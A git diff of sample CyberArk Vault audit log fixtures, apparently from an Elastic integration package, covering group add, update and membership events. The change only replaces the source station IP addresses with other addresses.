diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/259_add_update_group.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/259_add_update_group.log index 7284820d8e4..efc7388178f 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/259_add_update_group.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/259_add_update_group.log 
@@ -1,4 +1,4 @@ -<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMMaster","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} -<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} -<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} -<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMLiveSessionTerminators","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} +<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMMaster","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} +<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} +<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update 
Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} +<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMLiveSessionTerminators","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/265_add_group_member.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/265_add_group_member.log index bff61c277da..709d22f77a2 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/265_add_group_member.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/265_add_group_member.log 
@@ -1,14 +1,14 @@ -<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_localhost.localdomain","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_localhost.localdomain","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_localhost.localdomain","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T17:58:01Z VAULT 
{"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:01","IsoTimestamp":"2021-03-10T17:58:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T17:59:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:30","IsoTimestamp":"2021-03-10T17:59:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T22:17:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
14:17:15","IsoTimestamp":"2021-03-10T22:17:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_ASR-WIN","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_ASR-WIN","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_VAGRANT\n \n \n 81.32.170.205\n \n \n \n \n \n Add Group Member\n 
\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_VAGRANT\n \n \n 81.32.170.205\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_SSH\n \n \n 34.71.250.247\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group 
Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_SSH","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_SSH\n \n \n 34.71.250.247\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_SSH","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMP_ADB_AppUsers\n PSMP_ADB_asr-cyberark-psm-ssh\n \n \n 34.71.250.247\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group 
Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_asr-cyberark-psm-ssh","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_localhost.localdomain","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_localhost.localdomain","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group 
Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_localhost.localdomain","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T17:58:01Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:01","IsoTimestamp":"2021-03-10T17:58:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_VAGRANT","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T17:59:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:30","IsoTimestamp":"2021-03-10T17:59:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group 
Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_VAGRANT","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T22:17:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:15","IsoTimestamp":"2021-03-10T22:17:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_ASR-WIN","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group 
Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_ASR-WIN","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_VAGRANT\n \n \n 67.43.156.13\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_VAGRANT","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_VAGRANT\n \n \n 67.43.156.13\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_VAGRANT","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 
2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_SSH\n \n \n 67.43.156.15\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_SSH","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_SSH\n \n \n 67.43.156.15\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_SSH","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMP_ADB_AppUsers\n 
PSMP_ADB_asr-cyberark-psm-ssh\n \n \n 67.43.156.15\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_asr-cyberark-psm-ssh","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/266_remove_group_member.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/266_remove_group_member.log index 7b0f9be88a0..85ca20fc3cb 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/266_remove_group_member.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/266_remove_group_member.log 
@@ -1,2 +1,2 @@
-<5>1 2021-03-10T17:59:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:48","IsoTimestamp":"2021-03-10T17:59:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}}
-<5>1 2021-03-10T22:19:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:23","IsoTimestamp":"2021-03-10T22:19:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}}
+<5>1 2021-03-10T17:59:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:48","IsoTimestamp":"2021-03-10T17:59:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}}
+<5>1 2021-03-10T22:19:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:23","IsoTimestamp":"2021-03-10T22:19:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}}
